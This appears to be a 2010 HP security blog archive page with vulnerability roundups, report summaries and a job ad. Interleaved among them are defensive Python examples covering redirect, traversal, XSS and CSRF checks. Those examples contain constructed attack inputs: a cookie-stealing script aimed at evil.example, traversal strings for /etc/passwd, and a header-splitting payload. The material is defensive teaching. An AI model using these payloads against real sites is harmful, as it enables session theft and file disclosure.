HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and perform a host of other malicious intents. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms—unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Displaying articles for: October 2010

80% of web applications can't pass a PCI audit

During recent in-depth security reviews of almost 3,000 applications, it was discovered that over 80% of web applications failed to comply with the OWASP Top 10 list of critical web application risks and consequently could not pass a PCI compliance audit. Obviously, application security still has a long way to go. It's overly simplistic, but being in compliance with regulations like PCI provides a good baseline of security. You can still be hacked while compliant with PCI or HIPAA or anything else, but the chances that your organization will find itself in the news because of a breach are significantly reduced. There are far easier targets.

 

It was also discovered that over 80% of third-party code failed security tests. According to the report, anywhere from 30-70% of internally developed applications are composed of third-party components. That number should make the danger of insecure third-party code as clear as Stuxnet's abuse of Siemens software did (probably the most famous example to date of an attack enabled by a flaw in third-party code).

 

What will seem like common sense once you hear it: open-source software fared better than either its in-house or commercial brethren. A lot better. A whopping 93% of open source applications were not found to pose a security risk. Apparently many eyes (and many testers) do help to create more secure software.

 

As we've repeatedly seen over the past couple of years, Cross-Site Scripting remains the most common web application vulnerability. The report notes that a full 51% of the vulnerabilities discovered in these applications were Cross-Site Scripting.

 

Something of a bright spot, though: the average time for organizations to fix security defects has shrunk from 36-82 days to 12-19. That's a significant drop. At least it's a start, and a good one at that.

 

http://www.darkreading.com/security_monitoring/security/app-security/showArticle.jhtml?articleID=227500475&cid=RSSfeed_DR_News%5C

Top Five Web Application Vulnerabilities 10/4/2010 - 10/17/2010

1) Oracle WebLogic Server Node Manager UNC Path Remote Security Vulnerability

 

Oracle WebLogic Server Node Manager is susceptible to a remote security vulnerability in its handling of UNC paths that could allow an attacker to execute malicious commands on the vulnerable server, possibly leading to compromise of the application and the affected system. As of this writing a patch has not yet been released. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/43931

 

2) Microsoft .NET Framework JIT Compiler Optimization Remote Code Execution Vulnerability

 

The Microsoft .NET Framework is susceptible to a remote code execution vulnerability in the JIT compiler's optimization code. An attacker can exploit this vulnerability to execute arbitrary code in the context of the currently authenticated user or the associated service account. Fixes for this vulnerability have been released. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/43781

 

3) IBM WebSphere Application Server for z/OS Multiple Vulnerabilities

 

IBM WebSphere Application Server for z/OS is susceptible to multiple vulnerabilities including Cross-Site Scripting and Cross-Site Request Forgery. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. Cross-Site Request Forgery relies on the victim's browser to deliver the attack: a link or script on a page the attacker controls makes the browser send a request to a site the user is currently logged into, and because the browser attaches the user's session cookie automatically, the site carries out that seemingly authorized but malicious action on the user's behalf. Updates which resolve these vulnerabilities have been released. Contact the vendor for additional details.

 

http://www.securityfocus.com/bid/43875
http://www.securityfocus.com/bid/43874

 

4) HP Systems Insight Manager Arbitrary File Download Vulnerability

 

HP Systems Insight Manager is susceptible to an arbitrary file download vulnerability. Attackers can leverage this vulnerability to read arbitrary files in the context of the application, possibly gathering information that could lead to more damaging attacks. Updates which resolve this vulnerability have been released. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/44098

 

5) Ruby on Rails Nested Attributes Security Bypass Vulnerability

 

Ruby on Rails is susceptible to a security bypass vulnerability in its nested attributes handling that can be exploited to bypass intended restrictions and perform unauthorized actions. Updates which resolve this vulnerability are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/44124

HP Software Professional Services seeks Application Security Delivery Consultant

HP Software Prof Svcs Application Security Delivery Consultant (Anywhere in the US)-428233

Location: Anywhere in the US, Atlanta, GA preferred
 
HP is looking for a qualified Sr. Application Security Consultant that has deep Application Security experience.  Consultant should have experience with performing Web Application Assessments, Network Penetration Testing, and be capable of manually exploiting/validating any identified vulnerabilities.  In addition to being able to perform security testing, the consultant must have strong technical writing skills so that exploits can be properly documented. 
 
The position will also involve implementing HP Application Security Products (e.g. AMP, WebInspect, and QAInspect). 50% of the job will be performing security assessments and the other 50% will be devoted to security product implementations. Applicants should have experience with application security products from HP/SPI Dynamics or IBM/Watchfire.
 
Qualifications:

 
Candidates must be willing to work with minimum supervision to accomplish customer objectives.  Network Security experience is a plus.  Candidate must be willing to travel 50% of the time.

 

For more information and to apply, visit https://hp.taleo.net/careersection/2/jobsearch.ftl and enter job req # 428233 in the job number field.

 

Please complete the pre-screening questions to be considered for this role.

Top Five Web Application Vulnerabilities 9/13/2010 - 10/3/2010

1) Microsoft IIS Request Header Buffer Overflow Vulnerability

 

Microsoft IIS is susceptible to a remote Buffer Overflow vulnerability. Specially crafted HTTP requests can be leveraged to remotely execute code and in some instances to take complete control of affected systems. Updates which resolve this issue are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/43138

 

2) IBM FileNet Application Engine Open Redirection and Cross-Site Scripting Vulnerabilities

 

IBM FileNet Application Engine is susceptible to Open Redirection and Cross-Site Scripting vulnerabilities. An attacker can leverage these issues to conduct spoofing and phishing attacks, and to execute script code in the browsers of unsuspecting users in the context of the affected application, possibly leading to theft of authentication credentials. Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/43272

 

3) HP System Management Homepage Multiple Vulnerabilities

 

HP System Management Homepage is susceptible to multiple vulnerabilities including Cross-Site Scripting, Information Disclosure, URI Redirection, and HTTP Response Splitting. These vulnerabilities can aid phishing attacks, be exploited to execute script in the browser of an unsuspecting user and steal cookie-based authentication credentials, influence or misrepresent how web content is served, cached, or interpreted, or be used to access sensitive information without the proper credentials. Updates which resolve these vulnerabilities are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/43208
http://www.securityfocus.com/bid/43269
http://www.securityfocus.com/bid/43334
http://www.securityfocus.com/bid/43462
http://www.securityfocus.com/bid/43463
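The URI Redirection and HTTP Response Splitting issues in the entry above (and the Open Redirection issue in the FileNet entry) come down to two server-side checks: does the redirect target point back at this site, and can a request parameter smuggle a CR/LF into a response header. The following is an added example written for this post, not code from HP SMH or any product listed; the host `portal.example`, the endpoint names and the payloads are assumptions constructed for illustration:

```python
"""Added example, not code from HP SMH or any product above: an open-redirect
check and a header setter that refuses CR/LF, with constructed payloads."""
from urllib.parse import urlsplit

SITE_HOST = "portal.example"   # assumed host of the application


def safe_redirect_target(target, allowed_host=SITE_HOST, default="/"):
    """Return `target` only if it points back at this site; otherwise `default`.
    Handles the usual bypasses: scheme-relative //host, userinfo in the
    authority, backslash-as-slash, and non-HTTP schemes such as javascript:."""
    if not target:
        return default
    target = target.strip()
    if any(c in target for c in "\\\r\n\x00") or target.startswith("//"):
        return default
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default            # javascript:, data:, vbscript: ...
    if parts.netloc:
        # Absolute URL: host must match exactly and carry no userinfo
        # ("https://portal.example@evil.example/" resolves to evil.example).
        if parts.hostname != allowed_host or parts.username is not None:
            return default
        return target
    if parts.scheme:              # "http:evil.example" parses as a bare path
        return default
    if not parts.path.startswith("/"):
        return default            # only site-absolute paths are accepted
    return target


def header_value_ok(value):
    """A CR/LF inside a header value ends the header (or the whole header
    block) and lets the attacker append headers or a second response."""
    return not any(ch in value for ch in "\r\n\x00")


def set_header(headers, name, value):
    """Refuse a splitting payload outright rather than trying to sanitise it."""
    if not (header_value_ok(name) and header_value_ok(value)):
        raise ValueError("forbidden control character in header %r" % name)
    headers[name] = value


def serialise(status, headers, body=""):
    """Wire form of a response, so the effect of splitting is visible."""
    lines = ["HTTP/1.1 %s" % status]
    lines += ["%s: %s" % (k, v) for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def redirect_unchecked(target):
    """The vulnerable pattern: the parameter goes straight into Location."""
    return serialise("302 Found", {"Location": target})


def redirect_checked(target):
    headers = {}
    set_header(headers, "Location", safe_redirect_target(target))
    return serialise("302 Found", headers)


if __name__ == "__main__":
    # Constructed splitting payload: a second header and a fake body.
    split = "/home\r\nSet-Cookie: role=admin\r\n\r\n<html>attacker page</html>"
    print(redirect_unchecked(split))
    print(redirect_checked(split))
    print(redirect_checked("//evil.example/login"))
```

In a real server the `Location` value should also be percent-encoded, and most modern frameworks already reject control characters in header values, which makes `set_header` redundant there; the containment logic in `safe_redirect_target` is the part frameworks leave to the application, and an allowlist of known paths is stricter still where the set of redirect targets is small.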

 

4) RSA Authentication Agent for Web Directory Traversal Vulnerability

 

RSA Authentication Agent for Web is susceptible to a Directory Traversal vulnerability.  An attacker can leverage this vulnerability to access arbitrary data, possibly leading to more damaging attacks. Updates which resolve this issue are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/43406
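The HP Systems Insight Manager entry in the previous Top Five and the RSA Authentication Agent entry above are both traversal-style bugs: a request parameter names a file and the server does not keep the result under its document root. As an added example (not code from either product), here is the vulnerable concatenation beside a resolver that decodes, normalises and then checks containment; the document root and file names are constructed for the example:

```python
"""Added example, not code from HP SIM or RSA's agent: resolving a request
parameter against a document root so that traversal sequences cannot reach
files outside it.  The root and file names are constructed for the example."""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/app/docs"   # assumed document root


def resolve_vulnerable(root, user_path):
    """The bug behind most "arbitrary file download" advisories: the parameter
    is glued onto the root and handed to the file system, so '../' walks up."""
    return root + "/" + user_path


def resolve_safe(root, user_path):
    """Decode, normalise, then require the result to stay under the root.
    Raises ValueError for anything that escapes or looks like an attack."""
    decoded = unquote(user_path)
    if "%" in decoded:                 # catch double encoding (%252e%252e)
        decoded = unquote(decoded)
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        raise ValueError("control character in path")   # e.g. %00 truncation
    decoded = decoded.replace("\\", "/")   # Windows-style separators
    if decoded.startswith("/") or not decoded:
        raise ValueError("absolute or empty path")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    # Containment is the real check; it is what '../' is trying to defeat.
    # "reports/../q3.pdf" is allowed because it still lands under the root.
    if not candidate.startswith(root_norm + "/"):
        raise ValueError("path escapes document root: %r" % user_path)
    return candidate


def is_safe(root, user_path):
    try:
        resolve_safe(root, user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ["reports/q3.pdf", "../../etc/passwd", "..%2f..%2fetc%2fpasswd",
              "..\\..\\windows\\win.ini", "safe.pdf%00../../etc/passwd"]:
        print("%-32s naive=%-40s safe=%s" % (p, resolve_vulnerable(DOC_ROOT, p),
                                            is_safe(DOC_ROOT, p)))
```

On a live file system the candidate should also go through `os.path.realpath` before the containment check, so that a symlink under the document root cannot point outside it.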

 

5) Mantis Multiple Cross-Site Scripting Vulnerabilities

 

Mantis is susceptible to multiple instances of Cross-Site Scripting. An attacker can leverage these issues to execute script code in the browsers of unsuspecting users in the context of the affected application, possibly leading to theft of authentication credentials and other attacks. Updates which resolve these issues are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/43604
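Cross-Site Scripting appears in four of the ten entries above and accounts for half the findings in the application-review data quoted earlier on this page, and the fix is the same each time: encode the reflected value for the context it lands in. The example below is added here and is not code from Mantis, FileNet, HP SMH or WebSphere. It renders a search page that reflects the query, first unencoded and then with context-aware output encoding, and checks the result by parsing it with the standard library's HTML parser; the payloads and the page template are constructed for the example:

```python
"""Added example, not code from Mantis, FileNet, SMH or WebSphere: a search
page that reflects the query, rendered without and then with context-aware
output encoding.  Payloads and the template are constructed here."""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed payload of the kind the entries above describe: it ships the
# victim's cookies to a host the attacker controls.
COOKIE_THIEF = ("<script>new Image().src='http://evil.example/?c='"
                "+document.cookie</script>")
# Constructed payload that breaks out of a quoted attribute instead.
ATTR_BREAKOUT = '" onmouseover="alert(document.cookie)'

TEMPLATE = ('<h2>Results for {text}</h2>'
            '<a href="/search?q={url}">Search again</a>')


def render_vulnerable(query):
    """Reflects the raw parameter into an HTML text node and into a URL inside
    an attribute: whatever the attacker puts in the request becomes markup."""
    return TEMPLATE.format(text=query, url=query)


def render_safe(query):
    """Encode for each context the value lands in: HTML entities for the text
    node, percent-encoding for the query-string component inside href."""
    return TEMPLATE.format(text=html.escape(query, quote=True),
                           url=quote(query, safe=""))


class ActiveContentFinder(HTMLParser):
    """Records anything the browser would execute: script tags, on* handlers,
    javascript: URLs.  Parsing is the honest check; substring search is not,
    because '&lt;script&gt;' in a text node is harmless."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append("event handler %s" % name)
            elif name in ("href", "src") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append("javascript: URL in %s" % name)


def active_content(fragment):
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


# The cookie-theft outcome also depends on the session cookie being readable
# from script; HttpOnly removes that even where an XSS slips through.
SESSION_COOKIE = "sid=abc123; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    for payload in (COOKIE_THIEF, ATTR_BREAKOUT):
        print("vulnerable:", active_content(render_vulnerable(payload)))
        print("safe      :", active_content(render_safe(payload)))
```

The same value needs a different encoder for each context (text node, attribute, URL component, and script block), which is why a single "sanitize input" pass at the front door keeps failing; encode at the point of output instead.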

Malicious JavaScript attacks have increased 60% so far this year

The 2010 Top Cyber Security Risks Report from HP TippingPoint DV Labs was just released and is definitely worth reading. Compiled from attack data from TippingPoint and Qualys, with additional analysis provided by the SANS Internet Storm Center, it provides an invaluable view into the current state of application security.

 

There are several key takeaways. One is that web applications continue to pose one of the biggest risks to corporate networks (ok, so that's not much of a surprise). Applications remain a double-edged sword. They're relatively inexpensive to produce and immensely flexible, so the number of them continues to rise. Yet it's this interactivity and availability that makes them such attractive targets. Long story short, it's not network security that's the weak link. It's the applications, dummy.

 

Trends that have been evident for several years have also been further clarified: attackers are unfortunately getting more organized and sophisticated in their methodologies. Intruders can easily be 'inside' for months without being detected, and take advantage of that window of opportunity to gather the information necessary to conduct far more devastating attacks.

 

While the number of vulnerabilities discovered in applications hasn't risen dramatically in recent years, that is no improvement, because the number of attacks per vulnerability has exploded. How is this? Hacking has evolved from sport and one-time stings into an organized (and often state-sponsored) criminal enterprise. There are more and smarter attackers (not to mention more compromised systems) now than ever before.

 

The exception to that flat trend in newly discovered vulnerabilities is Cross-Site Request Forgery (CSRF), which is on the rise. Part of the reason is that these are complex vulnerabilities and not easy to find, so the real scale of the problem is only now coming into focus. Compounding the issue, many web sites continue to ignore CSRF because, while there are ways to prevent these attacks, they can complicate the application's design. Better methods of discovery plus lax prevention will lead to even more CSRF vulnerabilities for the foreseeable future.
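Both the WebSphere entry in the previous Top Five and the CSRF paragraph above describe the same mechanism: the browser attaches the victim's session cookie to a request that the attacker's page triggered, so the server cannot tell a forged request from a genuine one by the cookie alone. The example below is added here (not code from WebSphere or the DV Labs report) and simulates exactly that exchange, showing why cookie-only authentication fails and how a per-session synchronizer token plus an Origin check stops it; the bank endpoint, the session layout and the two requests are assumptions constructed for the example:

```python
"""Added example, not from WebSphere or the DV Labs report: a funds-transfer
endpoint first without and then with CSRF protection, exercised by a simulated
browser that attaches the victim's session cookie to every request, including
one auto-submitted by an attacker's page.  Endpoint and session layout are
assumptions made for the example."""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://bank.example"   # assumed origin of the application
SESSIONS = {}                          # session id -> session state


@dataclass
class Request:
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def login(user):
    """Create a session; the CSRF token is bound to the session."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "balance": 100,
                     "csrf_token": secrets.token_urlsafe(32)}
    return sid


def transfer_form(sid):
    """Fields the legitimate page ships in a hidden input.  The same-origin
    policy stops a page on evil.example from reading this token."""
    return {"csrf_token": SESSIONS[sid]["csrf_token"]}


def _debit(sess, form):
    sess["balance"] -= int(form["amount"])
    return "ok"


def transfer_vulnerable(req):
    """Trusts the session cookie alone: the browser sends it automatically,
    so a cross-site form post is indistinguishable from a real one."""
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return "unauthenticated"
    return _debit(sess, req.form)


def transfer_protected(req):
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return "unauthenticated"
    # Defence 1: browsers add Origin to cross-site POSTs; reject a foreign one.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-origin"
    # Defence 2: synchronizer token, compared in constant time.  This is what
    # still holds when no Origin header is present.
    if not hmac.compare_digest(req.form.get("csrf_token", ""),
                               sess["csrf_token"]):
        return "rejected: missing or wrong token"
    return _debit(sess, req.form)


def forged_request(sid, origin="https://evil.example"):
    """What the victim's browser sends after loading the attacker's page: the
    bank's cookie rides along, the form fields are the attacker's."""
    headers = {"Origin": origin} if origin else {}
    return Request(cookies={"sid": sid},
                   form={"to": "attacker", "amount": "50"}, headers=headers)


def legitimate_request(sid):
    form = dict(transfer_form(sid), to="landlord", amount="30")
    return Request(cookies={"sid": sid}, form=form,
                   headers={"Origin": SITE_ORIGIN})


if __name__ == "__main__":
    sid = login("alice")
    print("vulnerable, forged :", transfer_vulnerable(forged_request(sid)))
    print("protected, forged  :", transfer_protected(forged_request(sid)))
    print("protected, no Origin:", transfer_protected(forged_request(sid, None)))
    print("protected, genuine :", transfer_protected(legitimate_request(sid)))
    print("balance:", SESSIONS[sid]["balance"])
```

The design cost the paragraph above alludes to is visible here: every state-changing form and every AJAX caller has to carry the token, and the check has to sit in front of every handler rather than in one place, which is why teams skip it. Putting it in framework middleware and using `SameSite` cookies on top reduces that burden without weakening the check.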

 

The most mind-blowing statistic, though, is that during the first half of 2010 malicious JavaScript attacks grew at an alarming rate of 60%. Data from January showed over 55,000 filter hits, while the data from June showed over 90,000. Attacks were most often conducted against government, financial, and educational institutions.

 

Obviously, the report goes into much greater detail (including example exploits) than this blog post, and includes much more information on many additional topics. View the full report here:

 

http://dvlabs.tippingpoint.com/toprisks2010

 

The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.